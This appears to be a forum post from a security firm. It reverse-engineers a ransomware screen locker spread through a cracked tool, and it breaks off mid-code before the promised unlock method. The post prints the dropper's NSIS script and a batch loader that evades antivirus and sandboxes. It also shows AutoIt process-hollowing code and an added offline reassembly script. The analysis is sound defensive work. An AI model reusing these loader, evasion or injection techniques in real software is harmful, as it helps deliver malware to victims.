[Exclusive] Cracking an Overseas Hacker Group's $20 Screen Locker: In-Depth Reverse Engineering + Unlock Guide
This post was last edited by Solarsec on 2024-9-3 15:42.

# **1. Background**
## **1.1 The client's locked machine and stolen accounts**
On 17 August 2024 a client contacted us reporting that an important computer had been hit by ransomware. On the afternoon of 16 August the client had downloaded a file from the internet, a crack for a professional tool used in their industry (the archive "arch1508_1324.7z" in the screenshot below). After extracting and running it, CPU usage spiked, disk I/O went to 100%, and within about thirty seconds a ransom message popped up.
Realizing something was wrong, the client immediately pulled the power and unplugged the network cable, but the system would no longer boot. Booting into a PE rescue environment, they found a ransom note text file reading "Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked". The note claims the attackers are the CryptoBytes hacker group and that the decryption key can be obtained by contacting them on Telegram.
Because the client's system could no longer boot normally, we extracted the malicious files and ran them in our sandbox; the screenshot below shows the ransom message and the locked screen after execution.
We eventually restored the client's system. Reverse engineering the malicious files also showed that the malware does much more than lock the machine: it drops further malicious components, and we tracked down and removed each of those backdoors for the client. This post is the detailed analysis of the malware and the method for unlocking the locker it drops.
## **1.2 Talking to the locker's operator**
Following the ransom note, we looked at the Telegram channel @yes_u_are_hacked. The channel was created on 5 September 2023 and contains ransom messages in Chinese, English and Arabic along with a large number of pleas from victims. The channel owner charges 20 USD to unlock an encrypted computer and sells the ransomware source code for 100 USD.
The channel also says to contact the Telegram user @Flainn1 for unlocking. The client's negotiation with the attacker produced a small mix-up: because the channel is full of Russian-language content, the client assumed they were dealing with a Russian hacker, but it turned out to be a Ukrainian one.
The operator demands 20 USD in USDT before unlocking. Since the client had come to us, paying that ransom was out of the question. Below we analyze the malware's behaviour in detail and show how to unlock the locker it drops without paying a single cent. Ransom? They get nothing. 🥚
# **2. Basic Information on the Malicious Files**
## **2.1 Sample details**
The three samples below are all 32-bit Windows GUI executables. The "Windows (2000)" reported by DIE is the minimum OS version in the PE header, not the victim's operating system. The 720 MiB size of AppFile.exe is almost certainly padding: the NSIS header it carries is only about 26 KiB, and bloated binaries are a common trick to stay above the upload limits of sandboxes and cloud scanners.

| Field | AppFile.exe | DocumentsKKFCAAKFBA.exe | lc.exe |
| --- | --- | --- | --- |
| Compiler | (not identified) | (not identified) | (not identified) |
| Size | 755603531 bytes (720.60 MiB) | 285184 bytes (278.50 KiB) | 184832 bytes (180.50 KiB) |
| Operating system | Windows (min. version 2000) | Windows (min. version 2000) | Windows (min. version 2000) |
| Architecture | I386 | I386 | I386 |
| Mode | 32-bit | 32-bit | 32-bit |
| Type | GUI | GUI | GUI |
| Endianness | LE | LE | LE |
| MD5 | 490f6e8fb98238758571d6aea92ccea4 | 9cf14b0c62311b27ace3c25c21a722ff | 7924c0f21738fab05f61102c0caf3da2 |
| SHA1 | fb24934f5ce41901e8d138046d33f6af2d0bd2cc | 4037b8cee08d09db0fce2d485ca3a83ca3f4871a | 09e6fd5797381eeb9ec60d5214f2932154636247 |
| SHA256 | 280c852ae170716d0f6f3da8532b77b7d88f5abab084e630b0d94c4ed47e0198 | 6419a4d08ba5c07e14c2d75b14ea8da5f2f340d4747e498fe515685c48542b33 | 9b29f5a1f0b6c270c90b343f4c6d0e0843201d687068dc5273cbf5074083609f |
## **2.2 Ransom note**
> Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked
# **3. Threat Profile**
## **3.1 Threat analysis**
| **Malware family** | CryptoBytes (Ukraine) |
| ----------------------------- | ------------------------------------------------------------ |
| **First seen / captured** | 2023-09-05 / 2024-08-16 |
| **Threat type** | Ransomware, screen locker |
| **Encrypted-file extension** | None (user files are hidden rather than encrypted, see the lc.exe analysis in Section 4) |
| **Ransom note filename** | info-0v92.txt |
| **Free decryptor?** | None published; the unlock code can be derived from the lock screen ID or the key file (Section 4) |
| **Contact** | Telegram channel @yes_u_are_hacked, operator @Flainn1; no e-mail address is given |
| **Detection names** | Avast (Win32:Malware-gen), AhnLab-V3 (Trojan/Win.Generic.C5576951), ALYac (Gen:Variant.Tedy.512515), Avira (no cloud) (TR/Ransom.imrnt), BitDefenderTheta (Gen:NN.ZexaF.36802.yq0@aSdxC8m), CrowdStrike Falcon (Win/malicious_confidence_100% (W)), Cylance (Unsafe), DeepInstinct (MALICIOUS), Emsisoft (Gen:Variant.Tedy.512515 (B)), ESET-NOD32 (A Variant Of MSIL/Filecoder.LU), GData (Gen:Variant.Tedy.512515), Ikarus (Trojan.MSIL.Crypt), K7GW (Trojan ( 0052f4e41 )) |
| **Symptoms** | The system cannot be used (explorer.exe is killed and a lock screen is shown), system information is sent back by the backdoor component, and the files in the user's profile folders are set hidden, system and read-only. |
| **Infection vector** | In this case a trojanized crack downloaded from the internet; the family is also reported via malicious e-mail attachments (macros), malvertising, exploits and malicious links |
| **Impact** | The system is locked behind the ransom screen; without the unlock code the only recourse is to reinstall the OS |
# **4. Reverse Engineering**
## **4.1 Reversing the locker chain**
### **AppFile.exe (malicious module downloader)**
**Protection:**
It is an NSIS installer.
**Entry point:**
DIE identifies the file as an NSIS installer, so the install script can be extracted. It runs silently (`SilentInstall silent`) with no installer UI.
Installer script:
The script does two things: it drops the embedded files into $TEMP and uses ExecShell to run `cmd /k move Laboratories Laboratories.cmd & Laboratories.cmd & exit`, which renames the dropped file Laboratories to Laboratories.cmd and executes it. The command is assembled from single characters pushed onto the NSIS stack ($3 = ".", $4 = "e"), so the strings "move" and ".cmd" never appear whole in the script. The MessageBox, registry, CopyFiles and Sleep instructions scattered between the File statements sit behind jumps such as `IfErrors label_22 label_22`, which branch to the same label either way, so they never execute; they are padding meant to confuse static analysis.
```
; NSIS script (UTF-8) NSIS-Park-1 Unicode
; Install
Unicode true
SetCompressor zlib
; --------------------
; HEADER SIZE: 26016
; START HEADER SIZE: 300
; MAX STRING LENGTH: 8196
; STRING CHARS: 2199
OutFile .exe
!include WinMessages.nsh
SilentInstall silent
; --------------------
; LANG TABLES: 1
; LANG STRINGS: 40
Name Name
BrandingText "Nullsoft Install System (Unicode) v2.46.5-Unicode"
; LANG: 1033
LangString LSTR_0 1033 "Nullsoft Install System (Unicode) v2.46.5-Unicode"
LangString LSTR_1 1033 "$(LSTR_2) Setup"
LangString LSTR_2 1033 Name
LangString LSTR_5 1033 "Can't write: "
LangString LSTR_8 1033 "Could not find symbol: "
LangString LSTR_9 1033 "Could not load: "
LangString LSTR_10 1033 "Create folder: "
LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?"
LangString LSTR_19 1033 "ExecShell: "
LangString LSTR_21 1033 "Extract: "
LangString LSTR_22 1033 "Extract: error writing to file "
LangString LSTR_23 1033 "Installer corrupted: invalid opcode"
LangString LSTR_24 1033 "No OLE for: "
LangString LSTR_25 1033 "Output folder: "
LangString LSTR_29 1033 "Skipped: "
LangString LSTR_30 1033 "Copy Details To Clipboard"
LangString LSTR_36 1033 "Unregistering: "
LangString LSTR_37 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file."
LangString LSTR_38 1033 "Registering: "
LangString LSTR_39 1033 Custom
InstType $(LSTR_39) ;Custom
; wininit = $WINDIR\wininit.ini
; --------------------
; SECTIONS: 1
; COMMANDS: 169
Section ; Section_0
; AddSize 3151
Push r
Pop $2
IfErrors label_5 label_5
Return
Quit
label_5:
SetShellVarContext all
IfFileExists C:\Mi$2c\*.* label_165
ClearErrors
IfErrors label_10 label_10
CopyFiles /FILESONLY EditingAdjacent DllUnregisterServer
label_10:
SetOutPath $TEMP
ReadEnvStr $6 RelyFrontier
GetFullPathName $8 RnRatedPowellRows
File Basename
ReadEnvStr $R7 NotifyBibliographic
Nop
File Laboratories
DeleteRegValue SHCTX "" AccomplishParadise
IfErrors label_22 label_22
MessageBox MB_OK BaselineIndiansToilet
MessageBox MB_OK|MB_ICONQUESTION BowlUsedAccentContribute
SetRegView 64
label_22:
File Adidas
IfErrors label_27 label_27
CopyFiles /FILESONLY ThingsWindow DllRegisterServer
Return
CopyFiles /FILESONLY AcceptEmerald DllUnregisterServer
label_27:
IfRebootFlag label_30 label_30
Exch
CopyFiles /FILESONLY PittsburghIts DllRegisterServer
label_30:
File Values
IfFileExists AmongstGayMuzeToxic label_33 label_33
MessageBox MB_OKCANCEL PagesHopefullyDemonstratedPragueTreatmentsVentures
label_33:
Nop
File Warming
Nop
DeleteRegValue SHCTX "" NanoSh
File Pale
ClearErrors
IfErrors label_41 label_41
CopyFiles /FILESONLY NeedleWaves DllUnregisterServer
label_41:
File Might
IfErrors label_46 label_46
CopyFiles /FILESONLY MaiRule DllRegisterServer
CreateDirectory ShemaleArrange
Abort PokemonClaire
label_46:
GetCurrentAddress $R6 ; StrCpy $R6 47
File Ted
ClearErrors
GetCurrentAddress $7 ; StrCpy $7 50
File Alien
ClearErrors
IfFileExists ZeroVehiclesLibraryRacksJet label_55 label_55
Sleep 8031
CopyFiles /FILESONLY BarTelevision DllRegisterServer
label_55:
File Newsletters
Push "Challenging "
GetTempFileName $6 WyUsbFinances
File Thereby
IfAbort label_63 label_63
Sleep 7536
Exch
Quit
label_63:
ClearErrors
File Writer
GetErrorLevel $9
GetCurrentAddress $R5 ; StrCpy $R5 67
File Clothing
GetFullPathName $R6 LizProperBen
GetErrorLevel $R5
File Buildings
ClearErrors
GetCurrentAddress $7 ; StrCpy $7 73
File Nos
IfErrors label_78 label_78
MessageBox MB_ABORTRETRYIGNORE ConditionsFrontHeraldJuneShop
CreateDirectory LatviaCaroline
Exch
label_78:
IfAbort label_82 label_82
SetOutPath CapabilitySudan
CopyFiles /FILESONLY SalariesCoalition DllUnregisterServer
Sleep 7131
label_82:
File Boy
GetFullPathName $9 SubsidiariesOpponent
Push 81631803
File Slim
Pop $R9
ClearErrors
File Affect
Goto label_93
DeleteRegKey 0x33F NeedleExotic VolvoGrocery
CopyFiles /FILESONLY McdonaldConsists DllUnregisterServer
CopyFiles /FILESONLY ConsultExamined DllUnregisterServer
label_93:
IntOp $R8 $8 >> 249
File Trim
GetFullPathName $R5 ForumsExpansionTheseTemporarilyWhileAspects
DeleteRegValue SHCTX "" QuotedReference
File Listen
IfAbort label_100 label_100
SetOutPath ProceedingsSome
label_100:
Push "Spell Preliminary Dash Towards "
File Nascar
IfRebootFlag label_105 label_105
Exch
CopyFiles /FILESONLY WebmastersMarie DllUnregisterServer
label_105:
GetErrorLevel $R9
File Impressive
GetErrorLevel $7
IfAbort label_112 label_112
Exch
CreateDirectory FantasticRenew
DeleteRegKey 0x454 PermalinkBeats ThumbzillaHolocaust
label_112:
File Highlighted
SetErrors
IfFileExists PikeWendy label_118 label_118
CreateDirectory TeachesSwift
Exch
Sleep 617
label_118:
File Spoken
GetTempFileName $9 PersonalEditedReprints
Nop
File Centered
GetTempFileName $R9 GradesUtc
IfFileExists WellnessKoreanBetter label_127 label_127
SetRegView 32
CopyFiles /FILESONLY SharkTrigger DllRegisterServer
SetOutPath AppsMuseum
label_127:
File Prostores
ReadEnvStr $8 EarningsHole
DeleteRegValue SHCTX "" ReadyCg
File Monte
GetFullPathName $R5 ArtisticRegular
GetTempFileName $7 KongTraining
File Southeast
IntOp $R8 212 - 910
GetTempFileName $R8 GigLuxuryGradeStaying
File Layer
Nop
ClearErrors
File Field
GetFullPathName $8 PoolsInstantlyCharitable
IfRebootFlag label_143 label_143
Quit
label_143:
File Commons
IfFileExists StupidArgumentsSuitesEmirates label_147 label_147
Quit
SetRegView 64
label_147:
Goto label_151
Abort EffectivenessImpressive
ReadINIStr $_195948525_ "" "" ""
Quit
label_151:
File Ez
IfRebootFlag label_156 label_156
MessageBox MB_OK|MB_RIGHT EngagementLensCabinLitigation
ReadINIStr $_195948525_ "" "" ""
Quit
label_156:
Push .
Pop $3
SetShellVarContext current
Push e
Pop $4
ClearErrors
Pop $7
ExecShell open cmd "/k mov$4 Laboratories Laboratories$3cmd & Laboratories$3cmd & exit" ; "open cmd"
Push 10773218
label_165:
DeleteRegValue SHCTX "" TreatingHomeland
Sleep 7098
GetCurrentAddress $R6 ; StrCpy $R6 168
SectionEnd
; --------------------
; UNREFERENCED STRINGS:
/*
1 ProgramFilesDir
17 "C:\Program Files"
34 $PROGRAMFILES
37 CommonFilesDir
52 "$PROGRAMFILES\Common Files"
68 $COMMONFILES
204 MattersMain
438 LegitimateEminem
816 TireApproaches
831 ChequeJapan
958 BlastAssured
1091 WorkstationAdobe
1108 MysimonMetallic
1317 MediterraneanIso
1645 UvAtlas
*/
```
Analysis of the Laboratories file (too long to show in full; excerpt):
```
Set Prescription=/
pNUhObserve Nvidia Teens Ages Described Joining Synopsis
DbwxGames Staffing Lol Weblogs Cook Colon Microwave Transition Earning
IjlNine Corruption Illness Events
rXSpas Crisis Carried
xDRetreat
rqUdConducted Cope Maximize
Set Readings=J
swkOCf
JuSwift Events
tqSpecializing Tickets Sales
UBFFExamination Affairs Doctrine
jNGage Bryant Videos Sensitivity
ahhfOriented Specializing Concept Private
kdTzVaried Providing United Several Hugo Organizing
LuqThousand Furnished Indoor Useful Tim Cards Corpus
nHPresidential Mattress Thomson Roland Hart
Set Madonna=
XiSuPioneer Community Charlie Fridge Fred
BufIIntimate Regulations Residents Voyeur Benefits Bridal Mix
qcqxPick Crops Advancement Dot False Assignment Lunch Annie Died
gLZRPolished Bloom Handed Greetings Taiwan Cleanup Enquiries Planet Saskatchewan
KRDBooth Ascii Pdas Segment Der Property Cents Scientists Displayed
jiJlJean Democrat Boss Dodge Operating Cr Tool
GAForm Me Debut Saying Orlando Da Warning
Set Background=G
GWMiTerminals Specs Obligation Chronicles Regular Jail Billing Timer
jFUrls Republicans Consolidated Annually Allen Economy
sECCircle Across Coal Officials Associated
SdzuExtends Axis Hair Interactions Romantic Distinction Dist Paxil
BwIwVernon Ta Neural
Set Pakistan=V
lsabMiniature Struck
ebD Humanitarian Buildings Holding Byte Palmer Miniature Linear Delhi
XGCalculators Filename Cents Elsewhere Bound Weak Dg Portfolio Carries
FZVelvet Essential Continued Hat Darwin Navigator Jail
PjVSoccer Define Alone Buf Ww Quizzes Display Pure Heating
PcTsunami Beastality Continues Developed Benchmark Blake
Set Lenders=y
JhdStd Flip Chances Fax Existence Brand Defining Greece
MkCeramic Occur Fingering Dude Enforcement Oracle
OSfDont Foam Queensland Capture Grip
cCOCinema Surfaces Tower Michel Bang Absolutely Prix Compatible
HaPrev Va Js Citizens Changes Boxing Athletic Reseller Mailto
CRTZWheel Squirt Trip Super Compact Indie
ZMvLOperators Shipment Negotiations
Set Postal=A
fIPediatric Dear Exhibition Entrance Keeps Agent Diverse
drBike Griffin Race Fetish Democratic Sake Clocks
WXMHuge Technologies Ignored Usgs Uruguay Energy Template
EdRdNissan Metallic Printing Horror Kernel Shaved
zwuBenjamin Diary Imagine
ZNLQLearners Testament Hobby Arc Bars Explaining Syria Identifies Ghz
ODRecreation Pantyhose Creation Jacksonville
biFormer Guitars Resort
Set Correct=R
SqKQAgo Heat Bm Pushed Cases Partnerships
oWZTube Floyd Pilot Produces Liver Sequences Phys Lifetime Pharmaceutical
IFKenya Places
kHqvEar Composed Mambo Widescreen Ou Ts Baseball
NgksJ Gui Marketing Chelsea
rsCir Entry
QXkShadows Bulgaria Logic Training Medication
HoRaces Textile
EJUqDk Romance Adrian Dns
rnBehalf Led Burner Tape College Class Podcasts Properties Nr
Set Al=i
fOtRHighways Ibm Downloaded
NmEnterprises Tunes Mask
llApprox Arizona Voted Invision Scotia
gXCCms Weighted
hjuPremier Completing Analyst Syndication Painted
NdSuites
jGmHard Lies Museum Propose Filme
fdIowa Tattoo Aspect Advantage Schedules Speaking Worship Association Sensitive
Set Arthritis=t
oHStrategies Conservation Catering Ruth
LKWPoints Mining Centuries Poster Manually Scan Comparable
TtcCattle Reproduction Manchester Combine Synthesis Liechtenstein Indicators
ZnjCollection Steven Change Clock Lil Perfect Deals Risks
sskJLinux Adjusted Suspected
irPermalink Push Incorrect
FOlGale Religion Continental
Set Expressed=n
JHqCultural Stud Parking Shore Sie Harrison Exists Keep
ZvJExtended Clause Pensions List Carry Proper Ministries Transport
wADETextiles Hong
RzSkCreations Municipal Stan Threats Angela Driven Bra Correction Content
JSToWorkshop Medicaid Ultra Increasing Voices Fiscal
ujkhAtom Ronald Clone Asia
Set Spain=s
XrJPig Ee Shipment
RJUDistrict Received Shows Shot Douglas Inclusive Header
DxNon Plates Roommates Static Apply
wNSIrish Couples
ddhCharles Prairie
vaAqDetermined Virgin Thereby Nuts Holdings Growth Somewhere
FrDImproved Ribbon Ct Seven Tulsa Anna Loving Seller Lifestyle
mXDictionaries Brazilian
```
The file is heavily obfuscated; with the junk lines stripped the real script is short. It first sets the environment variable rwUvTfWQtZfcV9tBZFV to Quotations.pif (a renamed AutoIt3 interpreter) and clears esJUby (the script extension), then reassembles the dropped fragments into two files:
| File | Role |
| ------------------- | ------------------ |
| rwUvTfWQtZfcV9tBZFV | AutoIt script interpreter (Quotations.pif, or AutoIt3.exe when an AV is detected) |
| resJUby | Compiled AutoIt script |
It also checks the process list for security products, looking for the following process names:
> wrsa.exe opssvc.exe avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe
If wrsa.exe or opssvc.exe (Webroot, Quick Heal) is running, it executes `ping -n 185 127.0.0.1`, which takes roughly three minutes and acts as a sleep to outlast sandbox time limits. (findstr returns errorlevel 0 on a match, so `if not errorlevel 1` means "if found".)
If avastui.exe, avgui.exe, bdservicehost.exe, ekrn.exe, nswscsvc.exe or sophoshealth.exe (Avast, AVG, Bitdefender, ESET, Norton, Sophos) is running, it instead sets rwUvTfWQtZfcV9tBZFV to AutoIt3.exe and esJUby to .a3x, i.e. it runs the script under the interpreter's real name with a compiled-script extension rather than a renamed .pif.
The interpreter is rebuilt with `findstr /V`, which drops the junk lines containing the marker sqpaxilclaimsml from the Alien fragment, followed by a binary append of Ez; the script is the binary concatenation of 29 fragments in a fixed order (the same names that appear as File statements in the NSIS script). Finally `start /I rwUvTfWQtZfcV9tBZFV resJUby` runs the AutoIt script.
```
Set rwUvTfWQtZfcV9tBZFV=Quotations.pif
Set esJUby=
tasklist | findstr /I "wrsa.exe opssvc.exe" & if not errorlevel 1 ping -n 185 127.0.0.1
Set /a Mc=736775
tasklist | findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" & if not errorlevel 1 Set rwUvTfWQtZfcV9tBZFV=AutoIt3.exe & Set esJUby=.a3x
cmd /c md Mc
findstr /V "sqpaxilclaimsml" Alien > Mc\rwUvTfWQtZfcV9tBZFV
copy /b Mc\rwUvTfWQtZfcV9tBZFV + Ez Mc\rwUvTfWQtZfcV9tBZFV
cd Mc
cmd /c copy /b ..\Writer + ..\Newsletters + ..\Slim + ..\Listen + ..\Impressive + ..\Centered + ..\Nos + ..\Adidas + ..\Trim + ..\Affect + ..\Basename + ..\Highlighted + ..\Prostores + ..\Ted + ..\Thereby + ..\Values + ..\Spoken + ..\Might + ..\Southeast + ..\Field + ..\Pale + ..\Clothing + ..\Boy + ..\Layer + ..\Buildings + ..\Monte + ..\Commons + ..\Warming + ..\Nascar resJUby
start /I rwUvTfWQtZfcV9tBZFV resJUby
choice /d y /t 5
```
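The fragment reassembly above can be replayed offline, which is handy when you want the loader and the compiled AutoIt script as files without ever letting the dropper run. The following script is an added example for this post, not code from the malware or its author: it parses the file-building lines of the deobfuscated Laboratories.cmd (the `findstr /V` filter and the `copy /b` concatenations) and applies them to fragments read from a directory, such as the output of extracting the NSIS installer with 7-Zip. The fragment names, order and marker string come from the listing; the fragment contents used by the self-test are constructed, and `findstr_v` is a model of the cmd tool rather than a byte-exact clone, so check the rebuilt interpreter by its MZ header or by hashing it against a known AutoIt3 build.

```python
"""Offline re-assembly of the AutoIt loader dropped by AppFile.exe.

Added example, not part of the original post. It replays the file-building
steps of the deobfuscated Laboratories.cmd (findstr /V filter and copy /b
concatenations) on fragments read from disk, so an analyst can rebuild
rwUvTfWQtZfcV9tBZFV (the interpreter) and resJUby (the compiled AutoIt
script) without running the dropper. Fragment contents in the self-test are
constructed; only the names, order and marker string come from the script.
"""
import re
from pathlib import Path

# File-building lines copied from the deobfuscated Laboratories.cmd listing.
DROPPER_SCRIPT = r'''
findstr /V "sqpaxilclaimsml" Alien > Mc\rwUvTfWQtZfcV9tBZFV
copy /b Mc\rwUvTfWQtZfcV9tBZFV + Ez Mc\rwUvTfWQtZfcV9tBZFV
cd Mc
cmd /c copy /b ..\Writer + ..\Newsletters + ..\Slim + ..\Listen + ..\Impressive + ..\Centered + ..\Nos + ..\Adidas + ..\Trim + ..\Affect + ..\Basename + ..\Highlighted + ..\Prostores + ..\Ted + ..\Thereby + ..\Values + ..\Spoken + ..\Might + ..\Southeast + ..\Field + ..\Pale + ..\Clothing + ..\Boy + ..\Layer + ..\Buildings + ..\Monte + ..\Commons + ..\Warming + ..\Nascar resJUby
'''

FINDSTR_RE = re.compile(r'^findstr /V "([^"]+)" (\S+) > (\S+)$')
COPY_RE = re.compile(r'^(?:cmd /c )?copy /b (.+?) (\S+)$')
# The 29 script fragments in concatenation order (they match the File statements in the NSIS script).
SCRIPT_FRAGMENTS = re.findall(r'\.\.\\(\w+)', DROPPER_SCRIPT)


def _name(token: str) -> str:
    """Drop the Mc\\ and ..\\ prefixes: every fragment is a flat file dropped into %TEMP%."""
    return token.rsplit('\\', 1)[-1]


def findstr_v(data: bytes, marker: bytes) -> bytes:
    """Model of findstr /V: keep each LF-delimited line that does not contain the marker.
    This models the tool, it is not a byte-exact clone; verify the result by its MZ header."""
    return b'\n'.join(line for line in data.split(b'\n') if marker not in line)


def rebuild(fragments: dict, script: str = DROPPER_SCRIPT) -> dict:
    """Replay the file-building commands. fragments maps dropped file name -> bytes."""
    files = dict(fragments)
    for line in script.strip().splitlines():
        m = FINDSTR_RE.match(line)
        if m:
            marker, src, dst = m.groups()
            files[_name(dst)] = findstr_v(files[_name(src)], marker.encode())
            continue
        m = COPY_RE.match(line)
        if m:
            parts = [_name(p.strip()) for p in m.group(1).split('+')]
            files[_name(m.group(2))] = b''.join(files[p] for p in parts)
        # 'cd Mc' and anything else does not change file contents
    return files


def rebuild_from_dir(dump_dir: str) -> dict:
    """Rebuild from a directory holding the files extracted from the NSIS installer."""
    frags = {p.name: p.read_bytes() for p in Path(dump_dir).iterdir() if p.is_file()}
    return rebuild(frags)


def demo_fragments() -> dict:
    """Constructed stand-ins: script chunks carrying their own name, an 'Alien' padded
    with junk lines that contain the findstr marker, and a short 'Ez' tail."""
    frags = {name: (name + '|').encode() for name in SCRIPT_FRAGMENTS}
    frags['Alien'] = (b'MZ-stub\njunk sqpaxilclaimsml junk\nINTERP-body\n'
                      b'more sqpaxilclaimsml\nINTERP-tail')
    frags['Ez'] = b'\x00TAIL'
    return frags


def demo() -> tuple:
    """Rebuild the interpreter and script from the constructed fragments."""
    files = rebuild(demo_fragments())
    return files['rwUvTfWQtZfcV9tBZFV'], files['resJUby']


if __name__ == '__main__':
    interp, script = demo()
    print(len(SCRIPT_FRAGMENTS), 'script fragments')
    print(interp)
    print(script)
```

For a real case call `rebuild_from_dir()` on the extraction directory and feed the resulting `resJUby` bytes to an AutoIt decompiler; the interpreter should hash to a stock AutoIt3 build, otherwise the `findstr` model above needs adjusting for that sample.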
Extracting the script from the AutoIt file reveals heavy obfuscation (only part of the code is shown, as it is very long):
```
Func COMMITSOMALIA($hrsinvestigationtheir, $compensationdesktoptrademarkphpbb = "", $verizonactressresistant = "", $proteinsidesbodiesfrancisco = 0x0)
While 0x2ef
$cabintestimonypanama = 0x811b
Switch $cabintestimonypanama
Case 0x811a
Chr(0xe5b)
PixelGetColor(REFUSEPARA("74d92d73d80d74d71d82d76d93d80d85d71d87d76d89d80d86d75d71d79d76d72d75d76d89d71", 0x7 + 0x0), REFUSEPARA("74d92d73d80d74d71d82d76d93d80d85d71d87d76d89d80d86d75d71d79d76d72d75d76d89d71", 0x7 + 0x0))
Floor(0x76)
MemGetStats()
$cabintestimonypanama = $cabintestimonypanama + 0x384ee / 0x384ee
Case 0x811b
Local $framingremedyadoptionspelling = DllStructCreate(REFUSEPARA("105d128d123d108d98", 0x9 + 0xfffffffe) & Call(REFUSEPARA("72d111d116d103d120d127d82d107d116", 0x9 + 0xfffffffd), $hrsinvestigationtheir) & REFUSEPARA("102", 0xf + 0xfffffffa))
ExitLoop
Case 0x811c
Cos(0x1d79)
Floor(0x24d)
Ceiling(0x2348)
PixelGetColor(REFUSEPARA("87d100d117d106d104d119d104d103d46d80d103d46", 0x5 + 0xfffffffe), REFUSEPARA("87d100d117d106d104d119d104d103d46d80d103d46", 0x5 + 0xfffffffe))
ProgressOff()
ObjGet(REFUSEPARA("76d103d116d116d123d63d82d99d123d111d103d112d118d63", 0x2 + 0x0))
$cabintestimonypanama = $cabintestimonypanama + 0xf2a4d / 0xf2a4d
EndSwitch
WEnd
While 0x14d
$xboxvt = 0x6d93
Switch $xboxvt
Case 0x6d92
IsDeclared(REFUSEPARA("67d66d83d84d33d33d33d33d66d84d84d86d78d70d69d33d33d33d33", 0x1 + 0x0))
IsDeclared(REFUSEPARA("77d74d80d79d84d34d67d66d83d79d34d73d70d77d70d79d66d34", 0x1 + 0x0))
PixelGetColor(REFUSEPARA("86d87d85d72d81d74d87d75d72d81d64d70d68d86d68d64", 0x3 + 0x0), REFUSEPARA("86d87d85d72d81d74d87d75d72d81d64d70d68d86d68d64", 0x3 + 0x0))
Cos(0x157f)
MemGetStats()
Ceiling(0x17ef)
$xboxvt = $xboxvt + 0x89c9f / 0x89c9f
Case 0x6d93
DllStructSetData($framingremedyadoptionspelling, 0x1, $hrsinvestigationtheir)
ExitLoop
Case 0x6d94
PixelGetColor(REFUSEPARA("69d103d110d103d100d116d99d118d107d113d112d34d71d122d101d110d119d117d107d120d103d110d123d34d86d113d113d34d90d110d34", 0x2 + 0x0), REFUSEPARA("69d103d110d103d100d116d99d118d107d113d112d34d71d122d101d110d119d117d107d120d103d110d123d34d86d113d113d34d90d110d34", 0x2 + 0x0))
Log(0x17c8)
DirGetSize(REFUSEPARA("82d123d108d103d104d50d83d114d122d104d117d118d104d111d111d104d117d50d81d108d102d100d117d100d106d120d100d50", 0x4 + 0xffffffff))
IsDeclared(REFUSEPARA("103d104d120d103d110d103d115d38d122d120d123d107d38d120d107d119d123d107d121d122d121d38", 0x6 + 0x0))
Floor(0x1d9)
ObjGet(REFUSEPARA("73d85d83d83d85d84d89d39", 0x9 + 0xfffffffd))
PixelGetColor(REFUSEPARA("104d122d120d121d116d114d120d52d111d116d122d119d115d102d113d110d120d121d52d120d104d109d116d113d102d119d52", 0x7 + 0xfffffffe), REFUSEPARA("104d122d120d121d116d114d120d52d111d116d122d119d115d102d113d110d120d121d52d120d104d109d116d113d102d119d52", 0x7 + 0xfffffffe))
Log(0x1d37)
$xboxvt = $xboxvt + 0x3e09e / 0x3e09e
EndSwitch
WEnd
While 0xf
$toldaustraliaamplifierbetween = 0x12f70
Switch $toldaustraliaamplifierbetween
Case 0x12f6f
Chr(0x5b9)
ProgressOff()
MemGetStats()
DirGetSize(REFUSEPARA("89d106d108d73d91d110d111d120d123d118d124d73", 0x9 + 0x0))
ObjGet(REFUSEPARA("68d71d91d81d80d70d49d82d71d67d84d78d49d69d75d81d49d85d69d81d86d78d67d80d70d49", 0x2 + 0x0))
DirGetSize(REFUSEPARA("112d117d123d108d117d107d108d107d39d39d39d39d121d118d124d123d112d117d108d122d39d39d39d39d112d117d123d108d121d112d116d39d39d39d39", 0xa + 0xfffffffd))
IsDeclared(REFUSEPARA("107d126d118d114d117d121d111d117d116d41", 0x7 + 0xffffffff))
Chr(0x18b5)
$toldaustraliaamplifierbetween = $toldaustraliaamplifierbetween + 0xd5b2e / 0xd5b2e
Case 0x12f70
Local $tbperformance = DllStructGetPtr($framingremedyadoptionspelling)
ExitLoop
Case 0x12f71
MemGetStats()
Log(0x940)
Chr(0xb3)
IsDeclared(REFUSEPARA("86d113d121d112d66", 0x3 + 0xffffffff))
Floor(0x23d)
Log(0x2044)
$toldaustraliaamplifierbetween = $toldaustraliaamplifierbetween + 0x2857e / 0x2857e
EndSwitch
WEnd
$craftstrademarksthanksgiving =
```
After deobfuscation the original code can be recovered (excerpt below, the full script is too long):
The script decrypts the embedded binary payload and injects it into a process, so the payload can be carved straight out of the script. The recovered code shows the injection setup: it opens explorer.exe and allocates a thread-attribute list for an extended STARTUPINFOEX (the pattern used for parent-PID spoofing), creates the target process with flags 0x8080004, i.e. CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED, drops the extended-startupinfo flag (0x8000004) if Kaspersky's avp.exe is running, and then builds a 32- or 64-bit CONTEXT structure, which is what a process-hollowing loader needs to redirect the suspended main thread into the injected payload.
```
Func COMMITSOMALIA($hrsinvestigationtheir, $compensationdesktoptrademarkphpbb = "", $verizonactressresistant = "", $proteinsidesbodiesfrancisco = 0x0)
Local $framingremedyadoptionspelling = DllStructCreate("byte[" & Call("BinaryLen", $hrsinvestigationtheir) & "]")
DllStructSetData($framingremedyadoptionspelling, 0x1, $hrsinvestigationtheir)
Local $tbperformance = DllStructGetPtr($framingremedyadoptionspelling)
$craftstrademarksthanksgiving = "dword cbSize; ptr Reserved; ptr Desktop; ptr Title; dword X; dword Y; dword XSize; dword YSize; dword XCountChars; dword YCountChars; "
$borderserverlargesusan = "dword FillAttribute; dword Flags; word ShowWindow; word Reserved2; ptr Reserved2; ptr hStdInput; ptr hStdOutput; ptr hStdError"
